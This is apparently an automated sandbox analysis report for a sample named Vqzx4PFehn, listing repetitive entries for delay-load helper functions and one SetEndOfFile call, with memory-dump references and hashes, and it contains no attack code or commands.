Uniqueness Score: -1.00%

Function 0101E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Uniqueness

Uniqueness Score: -1.00%

Function 0101E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Uniqueness

Uniqueness Score: -1.00%

Function 0101E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Uniqueness

Uniqueness Score: -1.00%

Function 0101E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Uniqueness

Uniqueness Score: -1.00%

Function 0101E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
Instruction ID: 89c26a5c292a286f63e2603ca45ee87d394c32d3c574eab7931c15f34ef57e62
Opcode Fuzzy Hash: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
Instruction Fuzzy Hash: 55A024C15D41013C31051171DD01C3F310CC5D0D11330411FFCC4D40447C441C010430

Uniqueness

Uniqueness Score: -1.00%

Function 0101E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
Opcode Fuzzy Hash: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430

Uniqueness

Uniqueness Score: -1.00%

Function 0101E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
Opcode Fuzzy Hash: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430

Uniqueness

Uniqueness Score: -1.00%

Function 0101E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Uniqueness

Uniqueness Score: -1.00%

Function 0101E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Uniqueness

Uniqueness Score: -1.00%

Function 0101E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Uniqueness

Uniqueness Score: -1.00%

Function 0101E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Uniqueness

Uniqueness Score: -1.00%

Function 0101E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Uniqueness

Uniqueness Score: -1.00%

Function 01009F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0100903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 01009F0C

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

